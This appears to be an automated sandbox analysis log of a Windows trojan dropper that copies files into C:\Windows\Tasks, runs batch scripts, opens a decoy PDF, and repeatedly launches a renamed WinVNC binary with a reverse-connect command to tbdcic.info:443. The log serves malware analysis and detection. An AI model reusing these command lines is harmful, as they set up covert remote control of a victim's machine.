Source: Xv6Ya.d8LhT.2.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: browser_sn.exe.8.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: T8xrZb7nBL.exe, 00000000.00000000.1416965730.000000000041C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONHOST.EXEj% vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1419617664.0000000002471000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe | Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: conhost.exe.8.dr | Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
Source: classification engine | Classification label: mal84.troj.spyw.evad.winEXE@69/63@3/1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree | 0_2_00408DBF
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx | 23_2_00007FF6C2B934B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B918A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle | 23_2_00007FF6C2B918A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx | 23_2_00007FF6C2B93550
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx | 27_2_00007FF6C2B934B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B918A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle | 27_2_00007FF6C2B918A0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx | 27_2_00007FF6C2B93550
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW | 0_2_004011D1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 23_2_00007FF6C2B92D00
Source: C:\Windows\Tasks\browser_sn.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 27_2_00007FF6C2B92D00
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next | 23_2_00007FF6C2BE9BC0
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z | 0_2_0040385E
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress | 0_2_00401DC9
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Downloads\Lom.pdf
Source: C:\Windows\Tasks\browser_sn.exe | Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000
Source: T8xrZb7nBL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: browser_sn.exe | String found in binary or memory: -install
Source: browser_sn.exe | String found in binary or memory: -startservice
Source: browser_sn.exe | String found in binary or memory: -stopservice
Source: browser_sn.exe | String found in binary or memory: -install
Source: browser_sn.exe | String found in binary or memory: -startservice
Source: browser_sn.exe | String found in binary or memory: -stopservice
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File read: C:\Users\user\Desktop\T8xrZb7nBL.exe
Source: unknown | Process created: C:\Users\user\Desktop\T8xrZb7nBL.exe "C:\Users\user\Desktop\T8xrZb7nBL.exe"
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: apphelp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: sspicli.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winsta.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wldp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
